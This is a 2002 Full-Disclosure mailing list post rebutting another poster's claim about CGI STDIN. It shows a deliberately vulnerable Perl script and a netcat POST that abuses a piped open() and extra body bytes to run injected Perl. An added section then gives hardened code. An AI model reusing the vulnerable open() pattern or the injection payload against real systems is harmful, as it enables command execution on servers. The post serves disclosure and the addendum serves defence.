[Full-Disclosure] PR0V1NG RFP WR0NG

From: full-disclosure@lists.netsys.com
Date: 08/27/02


From: full-disclosure@lists.netsys.com (full-disclosure@lists.netsys.com)
Date: Tue, 27 Aug 2002 13:00:10 -0700


> - - That ~el8 sympathizer got it wrong. It was not a blunder, and it still
> holds true:

> The Phrack article discusses how to pass parameters to a program exec'd
> *FROM WITHIN* a CGI. You can not pass POST parameter (STDIN) to these
> applications because the parent CGI reads in and parses STDIN before the
> sub-application is executed. The ~el8 sympathizer was talking about
> executing the CGI itself. Two different things.

Our esteemed web security expert doesn't know how to play around with
Content-Length properly. Ok, let's test the theory.

We download thttpd and run it like so...

bash-2.05a$ ./thttpd -D -p 6767 -c "/cgi-bin/*"

And in our cgi-bin directory we create a rudimentary script that reads only
POST data and parses it in a manner consistent with almost every Perl script
on the Net...

--------------------------------------------------------------------------------
bash-2.05a$ cat myscript.pl
#!/usr/bin/perl

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

@zzz = split(/&/, $buffer);
foreach $xxx (@zzz) {
    ($var, $val) = split(/=/, $xxx);
    $val =~ tr/+/ /;
    $val =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $form{$var} = $val;
}

$file = $form{'filename'};

open(F, "$file");
#@heh = <F>;
close(F);

#print "Content-Type: text/plain\r\n\r\n";
#print @heh;
--------------------------------------------------------------------------------

Now you're saying the parent CGI consumes STDIN and hence there is no way
for STDIN to be fed to the sub-application (a sub-application such as
/usr/bin/perl).

This is incorrect.

I'm going to make the 'filename' variable equal "/usr/bin/perl|". So the
POST data looks like this:

filename=/usr/bin/perl|

That has a length of 23 characters, so we make Content-Length 23. But there
is nothing stopping us from sending in more data after the 23 characters --
data that WILL be fed to the sub-application, which you say can't happen.

--------------------------------------------------------------------------------
bash-2.05a$ nc localhost 6767
POST /cgi-bin/myscript.pl HTTP/1.0
Content-Length: 23

filename=/usr/bin/perl|
system("echo owned > /tmp/fuckwhitehatz");
^C punt!
bash-2.05a$ cat /tmp/fuckwhitehatz
owned
--------------------------------------------------------------------------------

On closer inspection, the Novell advisory has nothing to do with this. I
apologize. But you are still wrong on other accounts.

Parent CGI = myscript.pl, yes it reads in and parses STDIN as you said.

sub-application = /usr/bin/perl -- I still managed to get STDIN fed to it
for the running of arbitrary Perl scripts, which makes your comment below
false.

> You can not pass POST parameter (STDIN) to these applications because the
> parent CGI reads in and parses STDIN before the sub-application is
> executed.

Get your free encrypted email at https://www.hushmail.com
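What the session above actually demonstrates is two separate defects in the test script: the two-argument open(F, "$file") lets a trailing "|" turn a file name into a command, and the parent reads only CONTENT_LENGTH bytes of the body, so whatever follows is still sitting on fd 0 when the child starts and is inherited as its STDIN. The following is an added illustration, not code from the original post or from either poster, of how a script that does the same parsing would close both holes. The allowed-files directory is created as a temp dir and the two request bodies are constructed samples, so it runs offline; in a real CGI the directory would be a fixed path.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Parse an application/x-www-form-urlencoded body the same way the post's
# script does: split on '&' and '=', '+' to space, %XX decoded.
sub parse_form {
    my ($body) = @_;
    my %form;
    for my $pair (split /&/, $body) {
        my ($var, $val) = split /=/, $pair, 2;
        next unless defined $var;
        $val = '' unless defined $val;
        $val =~ tr/+/ /;
        $val =~ s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;
        $form{$var} = $val;
    }
    return \%form;
}

# Reduce a user-supplied name to a plain file name inside $base, or undef.
# The character whitelist rejects '|', '/', '>' and every other character
# that open() or a shell would treat specially; '.' and '..' are refused too.
sub validate_filename {
    my ($name, $base) = @_;
    return undef unless defined $name && $name =~ /^([A-Za-z0-9_.-]+)$/;
    my $safe = $1;
    return undef if $safe eq '.' || $safe eq '..';
    return File::Spec->catfile($base, $safe);
}

# Hardened replacement for open(F, "$file"): three-argument open with an
# explicit '<' mode opens the path as a file no matter what it contains,
# so a trailing '|' can never start a command.
sub open_allowed_file {
    my ($name, $base) = @_;
    my $path = validate_filename($name, $base);
    return (undef, 'rejected by validation') unless defined $path;
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    return ($fh, 'opened');
}

# Defence in depth against the STDIN trick in the post: once the body has
# been read, point fd 0 at /dev/null so nothing the script later spawns can
# inherit the unread tail of the request.
sub detach_stdin {
    open(STDIN, '<', '/dev/null') or die "cannot reopen STDIN: $!";
}

# Assumed allowed-files directory, created here as a temp dir with one file.
my $base = tempdir(CLEANUP => 1);
open(my $out, '>', File::Spec->catfile($base, 'report.txt')) or die "$!";
print $out "quarterly report\n";
close $out;

# Constructed request bodies (not captured traffic) showing both outcomes.
for my $body ('filename=report.txt', 'filename=/usr/bin/perl|', 'filename=..') {
    my $form = parse_form($body);
    my ($fh, $status) = open_allowed_file($form->{filename}, $base);
    printf "%-26s -> %s\n", $body, $status;
    close $fh if $fh;
}
detach_stdin();
```

The order matters: validate, then open with an explicit mode, then drop STDIN before anything else runs. The first two fixes remove the command execution; the third removes the channel the post used to feed a script to the child, which still matters for any CGI that legitimately execs a helper after reading its body.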